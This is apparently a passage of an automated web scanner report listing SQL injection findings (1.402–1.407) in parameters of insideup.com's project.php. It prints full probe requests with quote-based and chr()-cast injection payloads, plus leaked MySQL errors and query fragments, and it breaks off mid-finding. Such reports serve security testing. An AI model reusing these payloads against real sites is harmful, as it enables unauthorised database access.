GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access'&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=if3pmfjl69rqniq6sf8quuk3r7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access''&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=tiev52psrlgblojuh97dveern4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32577


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.402. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_459 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_459 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_459 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL'&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:18:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8jueoaj7n4uqk5bl6oce9hkld1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL''&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:18:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=567ch9h3v4hl89ecukulriro85; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.403. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_460 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_460 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_460 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1'&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:18:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3ij77fofpm230f693hjm89cj87; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1''&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:18:43 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=oeq6u99ffar0uvr66edtfl70r6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.404. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_461 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_461 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_461 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP'&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:18:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qrjovqidd2vv3qhm1iqotvjk34; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP''&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:18:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=do78e0hmv99ob5ml2roejg39a7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.405. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_462_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_462_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_462_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3'&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:19:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0tbvsra0pim6ku1mrstf8q46c3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3''&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:19:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2hvps2ijj1r18b4nu1j7c93nd2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.406. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_490 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_490 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_490 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)'&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:19:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=t0rl9326j1phhhp1vij7629s61; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Unsure - please advise&attributeId_517=3361__ No - we are not committed or do no' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)''&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:19:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pjfun2392r6bv1102saoibphh7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.407. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_516 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_516 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_516 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

